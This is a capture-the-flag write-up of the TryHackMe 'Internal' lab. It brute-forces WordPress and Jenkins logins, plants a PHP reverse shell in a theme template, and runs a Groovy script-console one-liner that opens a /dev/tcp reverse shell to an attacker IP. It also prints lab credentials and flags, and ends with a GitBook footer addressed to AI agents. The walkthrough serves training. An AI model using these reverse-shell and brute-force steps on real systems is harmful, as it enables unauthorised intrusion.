> For the complete documentation index, see [llms.txt](https://ajaykumar-kanthi.gitbook.io/write-ups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-internal.md).

# THM - Internal

This machine is part of the THM - PT1 Exam learning process

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fxe5tXUurQ7oeyth3JCe4%2Fimage.png?alt=media&amp;token=5f95c1a5-e381-4798-95ff-b6d1c00dfc29" alt=""><figcaption></figcaption></figure>

### HTTP

Browsing to  the http port reveals a default Apache welcome page:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FLOUdH2lHR7Yj13DWnAas%2Fimage.png?alt=media&amp;token=c02aec1d-6fc1-41af-b4dc-cb4dbc09617b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjIArPYBpC1lPkyyU4Yev%2Fimage.png?alt=media&amp;token=f8b7317d-4530-4a34-a598-b6100b9cc34f" alt=""><figcaption></figcaption></figure>

### Wordpress

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMxoHAK3vJRyDdP0pfCip%2Fimage.png?alt=media&amp;token=71fdf4c4-edaa-4090-8736-eb30a4191791" alt=""><figcaption></figcaption></figure>

Powerful tool for credential enumeration and brute-forcing WordPress services called ‘wpscan.’

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FhV0f1hhvR9r4xvM9zr3W%2Fimage.png?alt=media&amp;token=a775ac5f-183f-4ed8-bd5a-0c22db9fb256" alt=""><figcaption></figcaption></figure>

Found a valid username called admin. we can use this brute force the user using rockyou.txt.

Syntax: `“*wpscan — url <http://internal.thm/wordpress> -U admin -P /usr/share/wordlists/rockyou.txt*”`

Success! We have found the password for admin: “*my2boys*”

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiU8SdyrktG5gdW1knwOG%2Fimage.png?alt=media&amp;token=3b83ef18-10a2-4569-bc52-a2f83a6b8703" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F1eCmbVWEhS3N0nXy4Ai0%2Fimage.png?alt=media&amp;token=d4bda1d2-62bc-45f6-92c3-ee4a18a6b1de" alt=""><figcaption></figcaption></figure>

#### Wordpress Reverse Shell

edit one of the existing templates to get reverse shell

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FaqozIdyEhoOwusV3kd38%2Fimage.png?alt=media&amp;token=247fb67c-9203-4606-8a52-025392122db0" alt=""><figcaption></figcaption></figure>

We can now download the php reverse shell script from here <https://github.com/pentestmonkey/php-reverse-shell> and change the local ip address.

Then you can copy the script on the 404 template which looks like below:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FOPuyyCyHKBGX68kH25n9%2Fimage.png?alt=media&amp;token=cee13294-5ff0-4e9b-99bc-5d123fc3aa44" alt=""><figcaption></figcaption></figure>

We can now apply the changes and set-up a local netcat listener:

`“*nc- lvnp 1234*”`

Browsing to the location of this 404 page should then execute the code and spawn a shell:

`“*<http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php*”`>

## Shell as aubreanna

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCGYt8mggFs74JiomrRjc%2Fimage.png?alt=media&amp;token=1a941c85-4ed1-4ba1-a28a-d1a6a92ca89a" alt=""><figcaption></figcaption></figure>

### Make the shell stable

`“*python3 -c ‘import pty; pty.spawn(“/bin/bash”)’*`

`*stty raw -echo; fg*`

`*export TERM=xterm*”`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fhog06UVLPWuVXOoBs8eU%2Fimage.png?alt=media&amp;token=4df18391-4c8f-4569-8f66-947e819c9a3d" alt=""><figcaption></figcaption></figure>

```
aubreanna@internal:~$ id
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)

aubreanna@internal:~$ ls -al
total 56
drwx------ 7 aubreanna aubreanna 4096 Aug  3  2020 .
drwxr-xr-x 3 root      root      4096 Aug  3  2020 ..
-rwx------ 1 aubreanna aubreanna    7 Aug  3  2020 .bash_history
-rwx------ 1 aubreanna aubreanna  220 Apr  4  2018 .bash_logout
-rwx------ 1 aubreanna aubreanna 3771 Apr  4  2018 .bashrc
drwx------ 2 aubreanna aubreanna 4096 Aug  3  2020 .cache
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 .gnupg
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 .local
-rwx------ 1 root      root       223 Aug  3  2020 .mysql_history
-rwx------ 1 aubreanna aubreanna  807 Apr  4  2018 .profile
drwx------ 2 aubreanna aubreanna 4096 Aug  3  2020 .ssh
-rwx------ 1 aubreanna aubreanna    0 Aug  3  2020 .sudo_as_admin_successful
-rwx------ 1 aubreanna aubreanna   55 Aug  3  2020 jenkins.txt
drwx------ 3 aubreanna aubreanna 4096 Aug  3  2020 snap
-rwx------ 1 aubreanna aubreanna   21 Aug  3  2020 user.txt

aubreanna@internal:~$ cat user.txt
THM{int3rna1_fl4g_1}
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F7J0kJF9U8LWHNvF76Jes%2Fimage.png?alt=media&amp;token=55455c75-b509-42f4-819c-93343b602e51" alt=""><figcaption></figcaption></figure>

o confirm that, we can simply run the ifconfig command to check the network configuration:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fh3LkrMTBwRtBMAaK4QfN%2Fimage.png?alt=media&amp;token=5e7bf993-cdd4-4b83-9399-f6cb7ffe000b" alt=""><figcaption></figcaption></figure>

It appears that there is a Docker instance running on the target machine with a 172-series IP address. Consequently, Jenkins is hosted within Docker, running on port 8080. To access it, we will employ an SSH tunneling technique to forward the Jenkins IP and port from the target machine to our attacker machine’s IP and port.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F98bcVulKY0dVIc1k9Wbr%2Fimage.png?alt=media&amp;token=f4d93fa1-0b94-4216-8e09-7584b36fb4fc" alt=""><figcaption></figcaption></figure>

To gain access to Jenkins, type localhost:\[Port Number] in your browser:

### Jenkins

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fi4ZzS0081yahbzb4t6H8%2Fimage.png?alt=media&amp;token=d507dd52-4094-4693-9aaf-1ec5d4fff61e" alt=""><figcaption></figcaption></figure>

ffuf -request \[file name] -request-proto http -w /usr/share/wordlists/SecLists/Passwords/xato-net-10-million-passwords-10000.txt”

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3NgxBmQ4cj9r7scUD7Tn%2Fimage.png?alt=media&amp;token=cd6d14d8-873f-4df3-8799-7fb4231c860a" alt=""><figcaption></figcaption></figure>

Success! Now we can log in to the Jenkins page with the valid credentials: “admin: spongebob”

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fx2UBdZo39R3T6M8ag93L%2Fimage.png?alt=media&amp;token=e30a974d-bb9d-4860-ac05-ea76fce0af2b" alt=""><figcaption></figcaption></figure>

### Jenkins RCE via Script Console

Under ‘Manage Jenkins’ > ‘Tools and Actions,’ there is a ‘Script Console’ where we can create our script.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F8PpkQGuo9XN34trsVkSo%2Fimage.png?alt=media&amp;token=f8ee646e-5c09-4c6b-8447-27ac57290870" alt=""><figcaption></figcaption></figure>

We can now proceed to execute the following command. However, please ensure that you start a Netcat listener before running this command.

`r = Runtime.getRuntime()`

`p = r.exec([“/bin/bash”,“-c”,“exec 5<>/dev/tcp/10.10.23.238/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])`

`p.waitFor()`

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fqadh9kHedcNftvWhJGSC%2Fimage.png?alt=media&amp;token=374475a6-ca1d-45e3-8ca0-333bade656d8" alt=""><figcaption></figcaption></figure>

Excellent! We have successfully received the reverse shell. As a standard practice, it is important to obtain a more stable shell once we have remote access to a target. In this case, we can use the ‘/bin/bash -i’ command to upgrade our shell to a Bash shell.\\

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FjfxWAYleL3UlYlUoumlA%2Fimage.png?alt=media&amp;token=bfe3a7db-3475-4035-898c-3e7e658bf014" alt=""><figcaption></figcaption></figure>

Now that we have a stable shell, our next objective is to escalate our privileges. As you may recall, we discovered the password for the ‘aubreanna’ user under the ‘/opt’ directory. Let’s revisit the same location and see if we can find anything interesting.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FTN7TfgyzQvXY36UOveTC%2Fimage.png?alt=media&amp;token=c4aeedb8-8d81-49ac-8bf9-5c5404ba1587" alt=""><figcaption></figcaption></figure>

There’s a file called ‘note.txt’ that contains the information we need.

```
cd /opt
pwd
/opt
ls -al
total 12
drwxr-xr-x 1 root root 4096 Aug  3  2020 .
drwxr-xr-x 1 root root 4096 Aug  3  2020 ..
-rw-r--r-- 1 root root  204 Aug  3  2020 note.txt

cat note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you  need access to the root user account.
root:tr0ub13guM!@#123
```

## Shell as Root

```
$ ssh root@internal.thm
root@internal.thm's password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
[SNIP!]
Last login: Mon Aug  3 19:59:17 2020 from 10.6.2.56
root@internal:~# cat /root/root.txt
THM{d0ck3r_d3str0y3r}
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/tryhackme-oscp-machines/thm-internal.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
